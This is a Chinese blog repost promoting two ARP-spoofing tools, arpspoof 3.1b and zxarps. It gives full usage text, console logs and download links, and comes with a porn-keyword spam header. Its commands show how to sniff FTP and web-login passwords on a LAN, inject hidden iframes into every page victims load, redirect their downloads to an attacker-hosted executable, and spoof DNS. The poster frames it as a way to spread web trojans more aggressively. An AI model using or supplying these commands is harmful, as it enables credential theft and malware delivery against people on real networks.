日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

最近幻影的两个ARP欺骗工具 挺不错的

發布時間:2023/12/10 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 最近幻影的两个ARP欺骗工具 挺不错的 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

?arpspoof 3.1b

主要功能:ARP欺騙過程中進行數據修改,實現會話劫持攻擊
說明: 本程序公開源代碼,為了換取更多朋友的指教

實例: 欺騙192.168.0.108訪問百度網站的全過程(注:#后是我加的注釋)
效果: 192.168.0.108看到的百度首頁只有一句話“Hack by cooldiyer”,攻擊成功。
圖解:
__________________________________________________________________________________
F:/arpspoof/Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自動生成的規則文件,就能搞定

F:/arpspoof/Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
[*] Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加載文件job.txt中的規則,可用arpspoof /n生成模板
[*] Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加載了兩條規則,如果文件格式不對,程序在這里會中斷
[*] Spoofing 192.168.0.1 <-> 192.168.0.108 # 開始arpspoof欺騙,監視轉發的數據包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一個需要轉發的數據包,但沒找到要替換的字符串
[*] Forwarding untouched packet of size 62 # 所以直接轉發出去,以下幾個也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*] Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一個需要轉發的數據包,找到了要替換的內容,應用規則。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替換成了“Hack by cooldiyer<noframes>”
[*] Done 1 replacements, forwarding packet of size 1474 # 給出提示這個數據包被替換了多少次,替換后包的大小 (調試用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自動恢復受騙主機的ARP緩存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________

其它說明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存數據到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只顯示數據
被替換的字符串要盡可能的短,這樣能減少程序負擔,可參考arpspoof /n生成的規則文件job.txt
需要說的是程序在公網下照樣使用,我已經解說過了,不再舉例.........
規則文件的使用可以看程序的書寫,本程序開放源代碼
希望測試出更多Bug, 我努力更新。。
By CoolDiyer 2006-11-12

下載:http://allyesno.gbaopan.com/files/127df7d9d1ee441d9994959af8e24c21.gbp

zxarps

在當今網馬橫飛的日子,我帖個東東,讓網馬飛得更猛烈些吧

說明:
需要winPcap
基于arp欺騙,
具體功能看下面的使用說明~~~懶得打太多字了~~~

一些注意:
通常欺騙都是針對 網關和同網段下的其他機,所以-sethost [ip] 參數可以不填,
但如果同網段下有某server,而你想嗅探其他用戶到該server的數據就要-sethost serverIP

Codz:

???????

0. Realtek RTL8139

????IP Address
. . . . . : 192.168.1.101

????Physical Address
. . : 00-11-D8-6B-5E-19

????
Default Gateway . . : 192.168.1.1



1. WAN
(PPP/SLIP) Interface

????IP Address
. . . . . : xx.xx.xx.xx

????Physical Address
. . : 00-52-00-00-00-00

????
Default Gateway . . : xx.xx.xx.xx

options
:

????-
idx [index]???????網卡索引號

????
-ip [ip]???????????欺騙的IP,'-'指定范圍,','隔開

????
-sethost [ip]??????默認是網關,可以指定別的IP

????
-port [port]???????關注的端口,'-'指定范圍,','隔開,沒指定默認關注所有端口

????
-reset?????????????恢復目標機的ARP表

????
-hostname??????????探測主機時獲取主機名信息

????
-logfilter [string]設置保存數據的條件,必須+-_做前綴,后跟關鍵字,

???????????????????????
','隔開關鍵字,多個條件'|'隔開

???????????????????????所有帶
+前綴的關鍵字都出現的包則寫入文件

???????????????????????帶
-前綴的關鍵字出現的包不寫入文件

???????????????????????帶_前綴的關鍵字一個符合則寫入文件
(如有+-條件也要符合)

????-
save_a [filename] 將捕捉到的數據寫入文件 ACSII模式

????
-save_h [filename] HEX模式



????
-hacksite [ip]?????指定要插入代碼的站點域名或IP,

???????????????????????
多個可用','隔開,沒指定則影響所有站點

????
-insert [html code]指定要插入html代碼



????
-postfix [string]??關注的后綴名,只關注HTTP/1.1 302

????
-hackURL [url]?????發現關注的后綴名后修改URL到新的URL

????
-filename [name]???新URL上有效的資源文件名



????
-hackdns [string]??DNS欺騙,只修改UDP的報文,多個可用','隔開

???????????????????????格式
: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1



????
-Interval [ms]?????定時欺騙的時間間隔,單位:毫秒:默認是3000 ms

????
-spoofmode [1|2|3] 將數據騙發到本機,欺騙對象:1為網關,2為目標機,3為兩者(默認)

????-
speed [kb]????????限制指定的IP或IP段的網絡總帶寬,單位:KB



example
:

????
嗅探指定的IP段中端口80的數據,并以HEX模式寫入文件

????zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log



????FTP嗅探
,在21或2121端口中出現USER或PASS的數據包記錄到文件

????zxarps
.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log



????HTTP web郵箱登陸或一些論壇登陸的嗅探
,根據情況自行改關鍵字

????zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log



????用
|添加嗅探條件,這樣FTP和HTTP的一些敏感關鍵字可以一起嗅探

????zxarps
.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log



????如果嗅探到目標下載文件后綴是exe等則更改Location
:為http://xx.net/test.exe

????
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe



????
指定的IP段中的用戶訪問到-hacksite中的網址則只顯示just for fun

????zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>"



????
指定的IP段中的用戶訪問的所有網站都插入一個框架代碼

????zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"



????
指定的兩個IP的總帶寬限制到20KB

????zxarps
.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20



????DNS欺騙

????zxarps
.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"



zxarps Build 01/19/2007 By LZX.

?

下載:http://allyesno.gbaopan.com/files/caef438cb81649dda7da376e515be0b7.gbp

???????????

再分享一下我老師大神的人工智能教程吧。零基礎!通俗易懂!風趣幽默!還帶黃段子!希望你也加入到我們人工智能的隊伍中來!https://blog.csdn.net/jiangjunshow

總結

以上是生活随笔為你收集整理的最近幻影的两个ARP欺骗工具 挺不错的的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。